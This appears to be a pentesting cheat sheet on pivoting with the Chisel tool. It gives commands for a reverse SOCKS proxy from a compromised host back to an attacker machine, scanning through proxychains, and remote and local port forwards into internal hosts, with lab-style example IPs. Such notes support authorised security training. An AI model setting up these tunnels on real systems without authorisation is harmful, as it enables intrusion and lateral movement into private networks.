Tunneling

CHISEL

Reverse SOCKS Proxy

#This connects back from a compromised server to a listener waiting on our attacking machine.

# & is used to back ground a process in the below commands

#On our own attacking box we would use a command that looks something like this:

./chisel server -p LISTEN_PORT --reverse &

example: chisel server -p 8000 --reverse

#On the compromised host, we would use the following command:

#This command connects back to the waiting listener on our attacking box, completing the proxy.

./chisel client ATTACKING_IP:LISTEN_PORT R:socks &

example: chisel.exe client 10.14.14.14:8000 R:socks

#the actual proxy has been opened on 127.0.0.1:1080. As such, we will be using port 1080 when sending data through the proxy.

#To use proxychains you just have to add the following line to /etc/proxychains.conf:

socks5 127.0.0.1 1080

Then use proxychains with all your favourite tools,

proxychains nmap -sC -sT -p 80 172.19.0.4

Remote Port Forward #######################################################################

#A remote port forward is when we connect back from a compromised target to create the forward.

#For a remote port forward, on our attacking machine we use the exact same command as before:

./chisel server -p LISTEN_PORT --reverse &

#Once again this sets up a chisel listener for the compromised host to connect back to.

#The command to connect back is slightly different this time, however:

./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT &

##### DESCRIPTION

ATTACKING IP: The attacker machines ip that is our own machines ip that we are attacking from.

LISTEN PORT: The port that we started the chisel server on.

LOCAL PORT: It is the port we wish to open on our own attacking machine to link with the desired target port.

TARGET IP: The internal network ip on the victim machine that we found.

TARGET PORT: The internal network ip machines port that we found on victim machine

## EXAMPLE 

 let's assume that our own IP is 172.16.0.20, the compromised server's IP is 172.16.0.5, and our target is port 22 on 172.16.0.10. The syntax for forwarding 172.16.0.10:22 back to port 2222 on our attacking machine would be as follows:

./chisel client 172.16.0.20:1337 R:2222:172.16.0.10:22 &

Connecting back to our attacking machine, functioning as a chisel server started with:

./chisel server -p 1337 --reverse &

This would allow us to access 172.16.0.10:22 (via SSH) by navigating to 127.0.0.1:2222.

Local Port Forward #######################################################################

#As with SSH, a local port forward is where we connect from our own attacking machine to a chisel server listening on a compromised target.

#On the compromised target we set up a chisel server:

./chisel server -p LISTEN_PORT

#We now connect to this from our attacking machine like so:

./chisel client LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORT

#For example, to connect to 172.16.0.5:8000 (the compromised host running a chisel server), forwarding our local port 2222 to 172.16.0.10:22 (our intended target), we could use:

./chisel client 172.16.0.5:8000 2222:172.16.0.10:22